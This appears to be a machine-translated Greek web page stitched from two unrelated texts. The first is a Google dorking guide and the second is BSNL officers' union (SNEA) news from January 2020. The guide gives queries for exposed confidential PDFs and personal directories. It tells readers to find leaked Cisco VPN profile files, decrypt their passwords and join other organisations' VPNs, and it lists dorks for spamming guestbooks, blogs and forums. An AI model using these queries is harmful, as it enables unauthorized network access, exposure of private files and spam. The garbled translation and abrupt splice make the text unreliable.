Η συνάφεια είναι εξαιρετικά σημαντική εδώ: τα παλιά τρωτά σημεία κλείνουν πολύ αργά, αλλά το Google και τα αποτελέσματα αναζήτησής του αλλάζουν συνεχώς. Υπάρχει ακόμη και διαφορά μεταξύ του φίλτρου "τελευταίο δευτερόλεπτο" (&tbs=qdr:s στο τέλος του url του αιτήματος) και του φίλτρου "σε πραγματικό χρόνο" (&tbs=qdr:1).
Το χρονικό διάστημα της τελευταίας ημερομηνίας ενημέρωσης αρχείου από την Google υποδεικνύεται επίσης σιωπηρά. Μέσω της γραφικής διεπαφής web, μπορείτε να επιλέξετε μία από τις τυπικές περιόδους (ώρα, ημέρα, εβδομάδα κ.λπ.) ή να ορίσετε ένα εύρος ημερομηνιών, αλλά αυτή η μέθοδος δεν είναι κατάλληλη για αυτοματοποίηση.
Ανά τύπο γραμμή διεύθυνσηςμπορεί κανείς μόνο να μαντέψει έναν τρόπο περιορισμού της παραγωγής των αποτελεσμάτων χρησιμοποιώντας την κατασκευή &tbs=qdr: . Το γράμμα y μετά από αυτό καθορίζει ένα όριο ενός έτους (&tbs=qdr:y), το m δείχνει τα αποτελέσματα για τον τελευταίο μήνα, w για την εβδομάδα, d για την προηγούμενη ημέρα, h για την τελευταία ώρα, n για το λεπτό, και s για το δώστε μου ένα δευτερόλεπτο. Τα πιο πρόσφατα αποτελέσματα που μόλις έγιναν γνωστά στην Google βρίσκονται χρησιμοποιώντας το φίλτρο &tbs=qdr:1.
Εάν πρέπει να γράψετε ένα δύσκολο σενάριο, θα είναι χρήσιμο να γνωρίζετε ότι το εύρος ημερομηνιών έχει οριστεί στο Google σε Ιουλιανή μορφή μέσω του τελεστή daterange. Για παράδειγμα, έτσι μπορείτε να βρείτε τη λίστα έγγραφα PDFμε τη λέξη εμπιστευτική που ανέβηκε από 1 Ιανουαρίου έως 1 Ιουλίου 2015.
Εμπιστευτικός τύπος αρχείου:pdf daterange:2457024-2457205
Το εύρος προσδιορίζεται σε μορφή ημερομηνίας Ιουλιανού χωρίς δεκαδικά ψηφία. Δεν είναι βολικό να τα μεταφράσετε χειροκίνητα από το Γρηγοριανό ημερολόγιο. Είναι πιο εύκολο να χρησιμοποιήσετε έναν μετατροπέα ημερομηνίας.
Στόχευση και φιλτράρισμα ξανά
Εκτός από τον καθορισμό πρόσθετων τελεστών στο ερώτημα αναζήτησης, μπορούν να σταλούν απευθείας στο σώμα του συνδέσμου. Για παράδειγμα, το χαρακτηριστικό filetype:pdf αντιστοιχεί στην κατασκευή as_filetype=pdf. Έτσι, είναι βολικό να ορίσετε τυχόν διευκρινίσεις. Ας πούμε ότι η έξοδος των αποτελεσμάτων μόνο από τη Δημοκρατία της Ονδούρας ορίζεται προσθέτοντας την κατασκευή cr=countryHN στη διεύθυνση URL αναζήτησης, αλλά μόνο από την πόλη Bobruisk - gcs=Bobruisk . Δείτε την ενότητα προγραμματιστών για μια πλήρη λίστα των .
Τα εργαλεία αυτοματισμού της Google έχουν σχεδιαστεί για να κάνουν τη ζωή πιο εύκολη, αλλά συχνά επιβαρύνουν την ταλαιπωρία. Για παράδειγμα, η πόλη ενός χρήστη καθορίζεται από την IP του χρήστη μέσω του WHOIS. Με βάση αυτές τις πληροφορίες, η Google όχι μόνο εξισορροπεί το φορτίο μεταξύ των διακομιστών, αλλά αλλάζει και τα αποτελέσματα αναζήτησης. Ανάλογα με την περιοχή, για το ίδιο ερώτημα, διαφορετικά αποτελέσματα θα φτάνουν στην πρώτη σελίδα και ορισμένα από αυτά μπορεί να αποδειχθούν εντελώς κρυφά. Νιώστε σαν κοσμοπολίτης και η αναζήτηση πληροφοριών από οποιαδήποτε χώρα θα βοηθήσει τον διψήφιο κωδικό της μετά την οδηγία gl=country . Για παράδειγμα, ο κωδικός για την Ολλανδία είναι NL, ενώ το Βατικανό και η Βόρεια Κορέα δεν έχουν δικό τους κωδικό στο Google.
Συχνά τα αποτελέσματα αναζήτησης είναι γεμάτα ακόμα και μετά τη χρήση μερικών προηγμένων φίλτρων. Σε αυτήν την περίπτωση, είναι εύκολο να κάνετε πιο συγκεκριμένο το ερώτημα προσθέτοντας μερικές λέξεις εξαίρεσης σε αυτό (κάθε μία από αυτές προηγείται από ένα σύμβολο μείον). Για παράδειγμα, το banking , τα ονόματα και ο οδηγός χρησιμοποιούνται συχνά με τη λέξη Personal. Επομένως, τα πιο καθαρά αποτελέσματα αναζήτησης δεν θα εμφανίζουν ένα παράδειγμα ενός βιβλίου ερωτήματος, αλλά ένα εκλεπτυσμένο:
Τίτλος:"Ευρετήριο /Personal/" -ονόματα -tutorial -banking
Τελευταίο Παράδειγμα
Ένας εξελιγμένος χάκερ διακρίνεται από το γεγονός ότι παρέχει στον εαυτό του όλα όσα χρειάζεται μόνος του. Για παράδειγμα, ένα VPN είναι ένα βολικό πράγμα, αλλά είτε ακριβό είτε προσωρινό και με περιορισμούς. Το να εγγραφείτε μόνοι σας είναι πολύ ακριβό. Είναι καλό που υπάρχουν ομαδικές συνδρομές και με τη βοήθεια της Google είναι εύκολο να γίνεις μέλος μιας ομάδας. Για να το κάνετε αυτό, απλώς βρείτε το αρχείο διαμόρφωσης Cisco VPN, το οποίο έχει μια μάλλον μη τυπική επέκταση PCF και μια αναγνωρίσιμη διαδρομή: Program Files\Cisco Systems\VPN Client\Profiles . Ένα αίτημα, και γίνετε μέλος, για παράδειγμα, στο φιλικό προσωπικό του Πανεπιστημίου της Βόννης.
Τύπος αρχείου:pcf vpn Ή Ομάδα
ΠΛΗΡΟΦΟΡΙΕΣ
Η Google βρίσκει αρχεία διαμόρφωσης με κωδικούς πρόσβασης, αλλά πολλά από αυτά είναι κρυπτογραφημένα ή αντικαθίστανται με κατακερματισμούς. Αν δείτε συμβολοσειρές σταθερού μήκους, αναζητήστε αμέσως μια υπηρεσία αποκρυπτογράφησης.Οι κωδικοί πρόσβασης αποθηκεύονται σε κρυπτογραφημένη μορφή, αλλά ο Maurice Massard έχει ήδη γράψει ένα πρόγραμμα για την αποκρυπτογράφηση τους και το παρέχει δωρεάν μέσω του thecampusgeeks.com.
Στο Βοήθεια Googleεκτελούνται εκατοντάδες διαφορετικοί τύποι επιθέσεων και δοκιμές διείσδυσης. Υπάρχουν πολλές επιλογές, που επηρεάζουν δημοφιλή προγράμματα, μεγάλες μορφές βάσης δεδομένων, πολυάριθμα τρωτά σημεία PHP, σύννεφα και ούτω καθεξής. Γνωρίζοντας τι ακριβώς ψάχνετε, είναι πολύ πιο εύκολο να λάβετε τις πληροφορίες που χρειάζεστε (ειδικά τις πληροφορίες που δεν είχατε σκοπό να δημοσιοποιήσετε). Όχι μόνο ο Shodan τροφοδοτεί ενδιαφέρουσες ιδέες, αλλά και οποιαδήποτε βάση δεδομένων ευρετηριασμένων πόρων δικτύου!
Πώς να κάνετε αναζήτηση χρησιμοποιώντας το google.com
Όλοι μάλλον ξέρουν πώς να το χρησιμοποιήσουν μηχανή αναζήτησης, όπως το Google =) Αλλά δεν γνωρίζουν όλοι ότι εάν συντάξετε σωστά ένα ερώτημα αναζήτησης χρησιμοποιώντας ειδικές δομές, μπορείτε να επιτύχετε τα αποτελέσματα αυτού που ψάχνετε πολύ πιο αποτελεσματικά και πιο γρήγορα =) Σε αυτό το άρθρο θα προσπαθήσω να δείξω τι και πώς πρέπει να κάνετε για να κάνετε σωστή αναζήτηση
Η Google υποστηρίζει αρκετούς τελεστές προηγμένης αναζήτησης που έχουν ιδιαίτερο νόημα κατά την αναζήτηση στο google.com. Συνήθως, αυτοί οι χειριστές τροποποιούν την αναζήτηση ή λένε ακόμη και στην Google να κάνει εντελώς διαφορετικούς τύπους αναζητήσεων. Για παράδειγμα, το σχέδιο Σύνδεσμος:είναι ένας ειδικός τελεστής και το ερώτημα σύνδεσμος: www.google.comδεν θα σας δώσει μια κανονική αναζήτηση, αλλά θα βρείτε όλες τις ιστοσελίδες που έχουν συνδέσμους στο google.com.
εναλλακτικούς τύπους αιτημάτων
κρύπτη:Εάν συμπεριλάβετε άλλες λέξεις στο ερώτημα, η Google θα επισημάνει αυτές τις λέξεις που περιλαμβάνονται στο αποθηκευμένο έγγραφο.
Για παράδειγμα, cache: www.websiteθα εμφανίζει αποθηκευμένο περιεχόμενο με επισημασμένη τη λέξη "ιστός".
Σύνδεσμος:το παραπάνω ερώτημα αναζήτησης θα εμφανίσει ιστοσελίδες που περιέχουν συνδέσμους προς το καθορισμένο ερώτημα.
Για παράδειγμα: σύνδεσμος: www.websiteθα εμφανίσει όλες τις σελίδες που έχουν σύνδεσμο προς http://www.site
σχετίζεται με:Εμφανίζει ιστοσελίδες που "σχετίζονται" με την καθορισμένη ιστοσελίδα.
Για παράδειγμα, σχετικό: www.google.comθα εμφανίσει ιστοσελίδες που είναι παρόμοιες με την αρχική σελίδα της Google.
πληροφορίες:Αίτημα πληροφοριών: θα παρέχει ορισμένες πληροφορίες που έχει η Google σχετικά με την ιστοσελίδα που ζητήσατε.
Για παράδειγμα, info: websiteθα εμφανίσει πληροφορίες για το φόρουμ μας =) (Armada - Φόρουμ ενηλίκων webmasters).
Άλλα αιτήματα πληροφοριών
καθορίζω:Το ερώτημα define: θα παρέχει έναν ορισμό των λέξεων που πληκτρολογείτε μετά από αυτό, που έχει συγκεντρωθεί από διάφορες διαδικτυακές πηγές. Ο ορισμός θα είναι για ολόκληρη τη φράση που εισάγεται (δηλαδή, θα περιλαμβάνει όλες τις λέξεις στο ακριβές ερώτημα).
αποθέματα:Εάν ξεκινήσετε ένα ερώτημα με μετοχές: Η Google θα χειριστεί τους υπόλοιπους όρους του ερωτήματος ως σύμβολα μετοχής και θα συνδέσει σε μια σελίδα που εμφανίζει τις προετοιμασμένες πληροφορίες για αυτά τα σύμβολα.
Για παράδειγμα, μετοχές: Intel yahooθα εμφανίσει πληροφορίες σχετικά με την Intel και το Yahoo. (Λάβετε υπόψη ότι πρέπει να εκτυπώσετε χαρακτήρες έκτακτων ειδήσεων, όχι το όνομα της εταιρείας)
Αίτημα τροποποιητών
ιστοσελίδα:Εάν συμπεριλάβετε το site: στο ερώτημά σας, η Google θα περιορίσει τα αποτελέσματα στους ιστότοπους που βρίσκει σε αυτόν τον τομέα.
Μπορείτε επίσης να αναζητήσετε μεμονωμένες ζώνες, όπως ru, org, com, κ.λπ. site: com site:ru)
allintitle:Εάν εκτελέσετε ένα ερώτημα με allintitle:, η Google θα περιορίσει τα αποτελέσματα με όλες τις λέξεις ερωτήματος στον τίτλο.
Για παράδειγμα, allintitle: αναζήτηση στο googleθα επιστρέψει όλες τις σελίδες αναζήτησης Google όπως εικόνες, Blog κ.λπ
τίτλος:Εάν συμπεριλάβετε τον τίτλο: στο ερώτημά σας, η Google θα περιορίσει τα αποτελέσματα σε έγγραφα που περιέχουν αυτήν τη λέξη στον τίτλο.
Για παράδειγμα, τίτλος: Επιχείρηση
allinurl:Εάν εκτελέσετε ένα ερώτημα με το allinurl: Η Google θα περιορίσει τα αποτελέσματα με όλες τις λέξεις ερωτήματος στη διεύθυνση URL.
Για παράδειγμα, allinurl: αναζήτηση στο googleθα επιστρέψει έγγραφα με το google και θα ψάξει στον τίτλο. Επίσης, προαιρετικά, μπορείτε να διαχωρίσετε λέξεις με κάθετο (/) και στη συνέχεια οι λέξεις και στις δύο πλευρές της κάθετης θα αναζητηθούν στην ίδια σελίδα: Παράδειγμα allinurl: φαγητό/μπαρ
inurl:Εάν συμπεριλάβετε το inurl: στο ερώτημά σας, η Google θα περιορίσει τα αποτελέσματα σε έγγραφα που περιέχουν αυτήν τη λέξη στη διεύθυνση URL.
Για παράδειγμα, Κινούμενα σχέδια inurl:website
κείμενο:αναζητά μόνο στο κείμενο της σελίδας για την καθορισμένη λέξη, αγνοώντας τον τίτλο και τα κείμενα των συνδέσμων και άλλα πράγματα που δεν σχετίζονται με. Υπάρχει επίσης ένα παράγωγο αυτού του τροποποιητή - allintext:εκείνοι. Επιπλέον, όλες οι λέξεις στο ερώτημα θα αναζητηθούν μόνο στο κείμενο, το οποίο είναι επίσης σημαντικό, αγνοώντας τις λέξεις που χρησιμοποιούνται συχνά σε συνδέσμους
Για παράδειγμα, intext:forum
εύρος ημερομηνιών:αναζητήσεις σε χρονικά πλαίσια (daterange:2452389-2452389), οι ημερομηνίες για την ώρα καθορίζονται σε Ιουλιανή μορφή.
Λοιπόν, και κάθε είδους ενδιαφέροντα παραδείγματα αιτημάτων
Παραδείγματα σύνταξης ερωτημάτων για το Google. Για spammers
inurl:control.guest?a=sign
Site:books.dreambook.com "Διεύθυνση URL αρχικής σελίδας" "Υπογραφή" inurl:sign
Ιστότοπος: www.freegb.net Ιστοσελίδα
Inurl:sign.asp "Αριθμός χαρακτήρων"
"Μήνυμα:" inurl:sign.cfm "Αποστολέας:"
inurl:register.php "Εγγραφή χρήστη" "Ιστότοπος"
Inurl:edu/βιβλίο επισκεπτών «Υπογράψτε το βιβλίο επισκεπτών»
Inurl: post "Δημοσίευση σχολίου" "URL"
Inurl:/archives/ "Σχόλια:" "Θυμάστε τις πληροφορίες;"
"Σενάριο και βιβλίο επισκεπτών Δημιουργήθηκε από:" "URL:" "Σχόλια:"
inurl:?action=add "phpBook" "URL"
Τίτλος: "Υποβολή νέας ιστορίας"
Περιοδικά
inurl:www.livejournal.com/users/mode=reply
inurl greatestjournal.com/mode=reply
Inurl:fastbb.ru/re.pl?
inurl:fastbb.ru /re.pl? "Βιβλίο επισκεπτών"
Blogs
Inurl:blogger.com/comment.g?”postID””anonymous”
Inurl:typepad.com/ "Δημοσίευση σχολίου" "Θυμάστε τα προσωπικά στοιχεία;"
Inurl:greatestjournal.com/community/ "Δημοσίευση σχολίου" "διευθύνσεις ανώνυμων αφισών"
"Δημοσίευση σχολίου" "διευθύνσεις ανώνυμων αφισών" -
Τίτλος: "Δημοσίευση σχολίου"
Inurl:pirillo.com "Δημοσίευση σχολίου"
Φόρουμ
Inurl:gate.html?”name=Forums” “mode=reply”
inurl:”forum/posting.php?mode=reply”
inurl:”mes.php?”
inurl:”members.html”
inurl:forum/memberlist.php?”
Τα μηνύματα ενημερώθηκαν τον Ιανουάριο 2020
16-01-2020
Συλλυπητήριο μήνυμα
Ο SNEA εκφράζει τη βαθιά θλίψη του για τον θάνατο του
Βετεράνος ηγέτης
Com K. Viswanathan
CHQ Ταμίας της JETA/JTOA (3 φορές)
19/11, D block Nandhini Flats Church Road, Chrompet Chennai 44,
15-01-2020
15-01-2020
15-01-2020
Μια σημαντική ανακάλυψη για την υπηρεσία FTTH Triple Play μέσω BSNL:
Ανοικτή πολιτική για την παροχή IPTV: Η πολυαναμενόμενη Πολιτική Παροχής υπηρεσιών IPTV μέσω BSNL FTTH από παρόχους περιεχομένου/συνεργάτες εκδόθηκε από την BSNL CO.
Αυτό το εγχείρημα διαφημίζεται ως απάντηση BSNL σε σημαντικούς ιδιωτικούς παίκτες που παρέχουν Υπηρεσίες Triple Play--
Με αυτό το έργο, η BSNL πρόκειται να παρέχει Real Triple Play Service στους πελάτες γιατί εδώ η παρακολούθηση τηλεόρασης δεν πρόκειται να καταναλώσει δεδομένα Διαδικτύου.
Αυτό θα είναι ένα σημαντικό Lifeline για την αναβίωση του BSNL.
Αυτό το Venture έχει ήδη αναπτυχθεί και υλοποιηθεί με επιτυχία ιδιωτικά από έναν LCO/TIP στο Thrissur BA στην Kerala Circle με την τεχνική υποστήριξη της BSNL in house talents με επικεφαλής τους Com Anoop K J, JTO OMCR, Ernakulam.
Έχουν επινοήσει μια εφαρμογή για την πραγματοποίηση/λήψη κλήσεων σταθερής τηλεφωνίας μέσω κινητού τηλεφώνου μέσω WiFi.
Αυτό το έργο παρουσιάστηκε στην πρόσφατη συνάντηση CWC του SNEA στο Bangalore τον Αύγουστο του 2019.
Έχουν ληφθεί διάφορες προτάσεις από διαφορετικούς Κύκλους για την υλοποίηση της IPTV μέσω του Δικτύου BSNL.
Η απουσία IPTV (ή υπηρεσίας τηλεόρασης) έχει αναγνωριστεί ως ένας από τους σημαντικότερους λόγους για την ανεπαρκή ανταπόκριση στις συνδέσεις BSNL FTTH από LCO πολλαπλών παρόχων σε όλη τη χώρα.
Η SNEA συνεχίζει το έργο σε όλα τα επίπεδα και είμαστε χαρούμενοι που βλέπουμε φως στο τέλος του τούνελ.
Συγχαίρουμε τα εσωτερικά ταλέντα στο BSNL που ανέδειξαν τις πραγματικές τους δυνατότητες.
Ο SNEA ευχαριστεί όλους τους αξιωματικούς που εργάστηκαν για την υλοποίηση του έργου στην BSNL CO και σε όλα τα Γραφεία Circle και ιδιαίτερα στην Com. P Padmanabha Rao, η AGS & DGM μας, η BSNL CO.
Ανοικτή πολιτική IPTV15-01-2020
Οργανωτική Αναδιάρθρωση: Συγχώνευση Μη Εδαφικών Κύκλων.
Οι Κύκλοι Συντήρησης και Έργων συγχωνεύτηκαν και μετονομάστηκαν σε Βασικό Δίκτυο-Μετάδοση (Ανατολή/Δύση/Βορράς/Νότος). Ξεχωριστός Κύκλος για τη Βορειοανατολική Περιφέρεια Δικτύου-Μετάδοσης ΒΑ που καλύπτει τους κύκλους AS, NE I και NE II. Σε ισχύ από 01/04/2020.
Τα Εργοστάσια Τηλεπικοινωνιών συγχωνεύτηκαν με τους αντίστοιχους Εδαφικούς Κύκλους ως επικεφαλής BA στις 01/02/2020.
Το NCNGN Circle συγχωνεύτηκε με το BBNW Circle.
Το Nodal Center Chandigarh συγχωνεύτηκε με το Punjab Circle.
Μόνο ένας Κύκλος Εκπαίδευσης με Αρχηγείο στο ALTTC, Gaziabad. Οι ALTTC, NATFM και BRRAITT θα λειτουργούν ως επικεφαλής BA. Μόνο ζώνες RTTC στο μέλλον.
Συνοδευτική επιστολή Παράρτημα15-01-2020
14-01-2020
Ο GS γράφει στον Shri P K Purwar, CMD/BSNL:
Παρακαλούμε λάβετε άμεσα μέτρα για Τακτική προώθηση αντί για διευθέτηση φροντίδαςσε διαφορετικές βαθμίδες μεταξύ των στελεχών που ήδη εργάζονται σε υψηλότερες κλίμακες με απλή αλλαγή σχεδιασμούγια να καλύψει το τεράστιο κενό που δημιουργήθηκε στις μονάδες πεδίου από το VRS 2019 και για να παρακινήσει τα στελέχη να αναλάβουν επιπλέον φόρτο εργασίας:
Σύμφωνα με τα διαθέσιμα στοιχεία, στις 01/02/2020,
i) Μόνο 57 DGM(T) θα είναι διαθέσιμα έναντι της εγκεκριμένης ισχύος του 1481.
ii) Μόνο 32 DGM(Fin) θα είναι διαθέσιμα έναντι της εγκεκριμένης ισχύος 402.
iii) Μόνο 1746 AGM(T) θα είναι διαθέσιμα στο BSNL αντί για 6500 AGM που θα λειτουργούν ένα χρόνο πριν. Στην προώθηση του DGM, ο αριθμός των ΕτΓ θα είναι περίπου 1200, λιγότερο από 20%. Οι ΣΔΕ με 15ετή υπηρεσία περιμένουν προαγωγή.
iv) Μόνο 70 CAO θα είναι διαθέσιμοι έναντι της εγκεκριμένης ισχύος του 1347. Δεν θα επαρκούν ακόμη και για άνθρωπος οκενές θέσεις DGM(Fin).
v) Χιλιάδες Στελέχη σε υψηλότερες κλίμακες εργάζονται σε ισοδύναμους βαθμούς JTO, SDE για 5 έως 30 χρόνια και περιμένουν την προαγωγή. Οι JTO που προσλήφθηκαν από το 1988 περιμένουν προαγωγή στην πτέρυγα Arch. Χιλιάδες παρτίδες ΚΤΤ από το 1999, το 2001 έως το 2008, 2010, 2013 κ.λπ. περιμένουν την πρώτη τους προώθηση. Η κατάσταση της πτέρυγας JTO (Civil/Elect/TF) είναι εξίσου κακή.
Διαφωνούμε πλήρως με την επικρατούσα διευθέτηση φροντίδας που ακολουθείται από τη διοίκηση αντί για τακτική προώθηση. Τα στελέχη εργάζονται ήδη σε υψηλότερες κλίμακες και ενδέχεται να προαχθούν σε υψηλότερους βαθμούς σε τακτική βάση μόνο με αλλαγή ονομασίας, αντί για ρύθμιση LA.
Επιστολή GS προς την CMD11-01-2020
Συνάντηση με τον Shri Arvind Vadnerkar, DIR(HR) στις 01/09/2020: Ο GS, Πρόεδρος και οι δύο AGS συναντήθηκαν με τον DIR(HR) παρουσία των Sr GM(Pers & Estt), GM(SR), GM(Restg), GM(Admn) και GMs(Pers) και συζήτησαν για τα ακόλουθα θέματα:
Κανόνες στελέχωσης και αναδιάρθρωση του BSNL: Εξηγήσαμε ότι το πρότυπο προσωρινής στελέχωσης που εκδόθηκε από το Restg cell δεν είναι καθόλου εφαρμόσιμο, καθώς οι πραγματικότητες του πεδίου δεν λαμβάνονται υπόψη από τη διοίκηση. Σύμφωνα με τα πρότυπα θερμοκρασίας, ορισμένες SSA με επικεφαλής τους GMs σήμερα πρέπει να διευθύνονται από SDE στο μέλλον. Θα υπάρχει ένας μεγάλος αριθμός μικρών SSA με τεράστιες γεωγραφικές περιοχές όπου θα δικαιολογούνται μόνο ένα ή δύο Στελέχη. Πρακτικά θα είναι αδύνατη η διατήρηση των υπηρεσιών σε αυτές τις περιοχές. Με την ανάθεση σε εξωτερικούς συνεργάτες, ο ρόλος και η ευθύνη των στελεχών δεν θα μειωθεί ιδιαίτερα στον τομέα CFA. Στις αγροτικές περιοχές, το clubbing όλων των εργασιών Μεταφοράς, BTS mtce, EB, συντήρησης καλωδίων με SDE(Group) με τεράστιες εκτάσεις θα νικήσει τον ίδιο τον σκοπό. Ομοίως, οι κανόνες αστικών περιοχών είναι επίσης αυστηροί. Άρα οι προσωρινές νόρμες πρέπει να αναθεωρηθούν άμεσα. Διαφορετικά δεν θα έρθει κανείς να δουλέψει στο εξωτερικό εργοστάσιο και στην Trans mtce και όσοι εργάζονται επίσης θα ζητήσουν απόσπαση σε Εσωτερικό, κινητό κλπ. Ομοίως, υποκατάστατα δεν επισημαίνονται σε πολλά SSA για ομαλή εξαγορά στις 31/01/2020. Ο διευθυντής και η GM(Restg) εξήγησαν ότι είναι μόνο προσωρινοί κανόνες που μπορούν να αναθεωρηθούν. Ζητήσαμε να επανεξεταστεί αμέσως.
Εξηγήσαμε περαιτέρω την απαίτηση από τις μονάδες πεδίου να συμπεριληφθεί και η συντήρηση του Πρωτεύοντος Καλωδίου στον διαγωνισμό για εξωτερική ανάθεση. Μεταξύ των διαθέσιμων TT, πολύ λίγοι έχουν γνώση της σύνδεσης καλωδίων και δεν επαρκούν για τη συντήρηση όλων των Κύριων Καλωδίων. Απαιτούνται άλλα για τη συντήρηση εσωτερικού χώρου/MDF/Σταθής ηλεκτροπαραγωγής. Αυτά τα γεγονότα εξηγούνται στη συνάντηση με την DIR(CFA), αλλά μέχρι στιγμής δεν έχουν βγει ευνοϊκές αποφάσεις. Η DIR(HR) διαβεβαίωσε ότι θα φέρει ξανά αυτό το σημαντικό θέμα στην αντίληψη της DIR(CFA).
Προσφορές στο σενάριο μετά το VRS και η ανάγκη για Τακτική Προώθηση αντί για ρύθμιση Lookafter: Διαμαρτυρηθήκαμε έντονα για την κίνηση για τη διευθέτηση του Look after αντί της Τακτικής προώθησης. Σχεδόν οι θέσεις DGM(T/Fin) και οι βαθμοί AGM/CAO/EE θα είναι κενές μετά το VRS στις 31/01/2020 και πρέπει να ληφθούν άμεσα μέτρα για προαγωγή, ζητήσαμε. Δεδομένου ότι μεγάλος αριθμός στελεχών με επαρκή εμπειρία εργάζονται σε υψηλότερες κλίμακες, μπορεί απλώς να τους δοθεί προαγωγή με αλλαγή ονομασίας, επισημάναμε. Ομοίως, χιλιάδες JTO σε διαφορετικές πτέρυγες βρίσκονται ήδη σε υψηλότερες κλίμακες και μπορούν να προαχθούν με επαναπροσδιορισμό. Ακόμη και το DPC δεν απαιτείται. Η συμφωνία του LA είναι αντίθετη προς το συμφέρον των στελεχών καθώς χάνουν την υπηρεσία και τους μελλοντικούς προωθητικούς τρόπους. Η διοίκηση κάνει χρόνια LA μαζί και αρνείται τις τακτικές προαγωγές. Απαιτήσαμε τη διακοπή αυτού του μηχανισμού και την παροχή τακτικών προαγωγών για όλα τα επιλέξιμα στελέχη.
σχετικά με τις προωθήσεις του DGM,Το SNEA εξήγησε τη συνάντηση με τον Γραμματέα, DoT την 01/01/2020 και τη θετική του απόφασή που επιτρέπει τις προαγωγές του DGM. Ακόμη και το DoT έδωσε προαγωγή σε επίπεδο Sr DDG (CGM) στις 30/12/2019 για όσους συνταξιοδοτούνται στις 31/12/2019, αλλά η BSNL δεν προβαίνει σε καμία ενέργεια για να δώσει προαγωγή στις κενές θέσεις πριν από τη συνταξιοδότησή τους. Μετά από συζήτηση, ο DIR(HR) διαβεβαίωσε ότι θα συζητήσει με τον Secretary/DoT και το CMD/BSNL και θα κάνει ό,τι χρειάζεται για τις προωθήσεις του DGM.
Η επαναφορά των JTOs Rect του 2001 πέρασε το LDCE -2007: Διεξήχθη ξανά συζήτηση για το θέμα και ο Assn εξήγησε την επιλεξιμότητά τους με αναφορά στη ρήτρα 12, σημείωση 5 του SDE RR και στις διευκρινίσεις που εκδόθηκαν το 2007 σχετικά με την επιλεξιμότητά τους να εμφανιστούν στο LDCE-2007. Τώρα ορισμένες από αυτές επιστρέφονται με βάση τις διευκρινίσεις που εκδόθηκαν το 2012 για το LDCE 2010. Οι διευκρινίσεις που εκδόθηκαν σχετικά με την καταλληλότητα για εμφάνιση στο LDCE 2007 και LDCE 2010 είναι εντελώς διαφορετικές και αυτό έκανε το ζήτημα περίπλοκο. Η επιλεξιμότητα πρέπει να αποφασιστεί με βάση τις διευκρινίσεις που εκδόθηκαν για το LDCE 2007, ζητήσαμε. Δεδομένου ότι έχουν ήδη γίνει SDE, δεν μπορούσαν να γράψουν το επόμενο DCE που πραγματοποιήθηκε το 2012 και το 2015. Μεταξύ αυτών, επίσης, ορισμένα SDE του TN Circle που αντιμετωπίζουν επαναφορά, ενώ άλλα εξυπηρετούνται δείχνουν μόνο αιτία ειδοποίησης. Απαιτήσαμε να σταματήσει η διαδικασία επαναφοράς μέχρι να αποφασιστεί το θέμα με βάση τα γεγονότα που τέθηκαν στη διοίκηση. Προτείναμε τη συγκρότηση Επιτροπής για την εξέταση του θέματος. Τέλος, η DIR(HR) έδωσε εντολή στους ενδιαφερόμενους Αξιωματικούς να προσκομίσουν όλους τους σχετικούς φακέλους την επόμενη μέρα για να λάβουν την κατάλληλη απόφαση.
10-01-2020
10-01-2020
10-01-2020
Συνάντηση με τον Shri P. K. Purwar, CMD BSNL στις 10.01.2020: Γενικοί Γραμματείς και AGS της AIBSNLEA και της SNEA συναντήθηκαν σήμερα με την CMD BSNL και είχαν τις συζητήσεις για τα ακόλουθα θέματα:
Προωθήσεις DGM(T):Όσον αφορά τις προαγωγές από το DET στο DGM (T), εξηγήσαμε σχετικά με τη συνάντηση με τον Γραμματέα (T) DoT την 01η Ιανουαρίου και 03 Ιανουαρίου 2020 κατά την οποία ο Γραμματέας (T) συμφώνησε για τις προαγωγές για το DGM (T) υπό τον όρο ότι δεν δημιουργεί πρόσθετες οικονομικές επιπτώσεις. Το CMD BSNL ενημέρωσε ότι είχε επίσης συζητήσει με τον Γραμματέα (T) σχετικά με αυτό και προσπαθούσε να κάνει το απαραίτητο.
Εκκαθάριση εκκρεμών οφειλών είσπραξης από το μισθό των εργαζομένων: Η CMD ενημέρωσε ότι η πληρωμή των ανακτήσεων GPF σε σχέση με τα VRS optees, περίπου 710 Rs. Crore θα αποδεσμευτεί τη Δευτέρα. Άλλες οφειλές θα εκκαθαριστούν επίσης το νωρίτερο.
Προσφορές για την κάλυψη κενών θέσεων μετά το VRS: Όσον αφορά τις Προσφορές, η CMD είναι της γνώμης ότι οι εργαζόμενοι πρέπει να ξεχάσουν τις προαγωγές για τουλάχιστον ένα χρόνο και να εργαστούν σκληρά για την Αναβίωση του BSNL. Επίσης, διατύπωσε τη γνώμη ότι θα εισαχθούν περισσότερα πλεονεκτήματα στις προσφορές στο μέλλον. Εξηγήσαμε τις επίγειες πραγματικότητες. Σχεδόν όλες οι θέσεις DGM στην Telecom & Finance Wings καθώς και οι θέσεις AGM & CAOs θα είναι κενές μετά την 31/01/2020 και θα είναι δύσκολο να λειτουργήσει το BSNL στη συνέχεια χωρίς να καλυφθούν αυτές οι κενές θέσεις σε άμεση βάση. Στασιμότητα επικρατεί στα Στελέχη της JTO και του SDE και οι προαγωγές τους δεν μπορούν να καθυστερήσουν. Κατά τη στιγμή της πρόσληψης JTO & JAOs καθώς και σε προαγωγές από JTO σε SDE, η διαγωνιστική εξέταση είναι διαθέσιμη και πρακτικά το 50% των στελεχών που είναι επιλέξιμα κατά τη στιγμή της προαγωγής είναι μόνο από ανταγωνιστική ποσόστωση, εξηγήσαμε. Η CMD BSNL συμφώνησε για την έλλειψη σε θέσεις AGM, CAO και DGM μετά το VRS 2019.
Αποχαιρετισμός στους συνταξιούχους υπαλλήλους: Ως προς την αναγνώριση των υπηρεσιών των συνταξιούχων, ζητήσαμε να αποκατασταθεί το ποσό των 3001 Rs/- καθώς είναι απλώς ένα δείγμα εκτίμησης για τις προηγούμενες υπηρεσίες τους στο BSNL και τιμή για αυτούς. Η CMD ενημέρωσε την αδυναμία του λόγω της κρίσης μετρητών στο BSNL. Σε αυτήν την περίπτωση, προτείναμε κάποια εναλλακτική ρύθμιση, όπως κουπόνια επαναφόρτισης ίσα με αυτό το ποσό. Η CMD εκτίμησε την πρότασή μας και συμφώνησε να εξετάσει την εναλλακτική λύση αντί για το χρηματικό έπαθλο.
